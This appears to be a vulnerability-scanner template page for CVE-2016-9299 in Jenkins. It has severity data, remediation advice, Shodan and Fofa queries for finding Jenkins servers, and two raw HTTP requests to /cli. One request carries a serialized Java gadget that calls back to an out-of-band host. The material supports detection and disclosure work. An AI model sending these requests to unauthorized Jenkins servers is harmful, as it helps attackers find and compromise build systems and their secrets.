| Title | Jenkins CLI - HTTP Java Deserialization |
|---|---|
| Author | iamnoooob,rootxharsh,pdresearch |
| Severity | Critical |
| Impact | Attackers can execute arbitrary code through Java deserialization, potentially leading to complete Jenkins server compromise and unauthorized access to all build systems and secrets. |
| Remediation | Update Jenkins to version 2.32 or LTS 2.19.3 or later that fixes the deserialization vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.86028 |
| CVE ID | CVE-2016-9299 |
| CWE ID | CWE-90 |
| Shodan Query | product:"jenkins" |
| Fofa Query | icon_hash=81586312 |
| Tags | cve cve2016 rce deserialization vkev vuln |
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.
POST /cli HTTP/1.1
Host: www.victim.com
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
POST /cli HTTP/1.1
Host: www.victim.com
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93
Side: upload
Content-Type: application/octet-stream
Content-Length: 466
<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4= U�� sr java.util.HashMap���`� F
loadFactorI thresholdxp?@ w sr java.net.URL�%76��r I hashCodeI portL authorityt Ljava/lang/String;L fileq ~ L hostq ~ L protocolq ~ L refq ~ xp��������t -d5jqklple0o44124f8ng1e5jsmd6x571b.oast.live//t q ~ t httppxt 4http://d5jqklple0o44124f8ng1e5jsmd6x571b.oast.live//x
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-9299.yaml
🦈 Packet Capture: ⬇️ Download cve-2016-9299.pcap
N/AN/A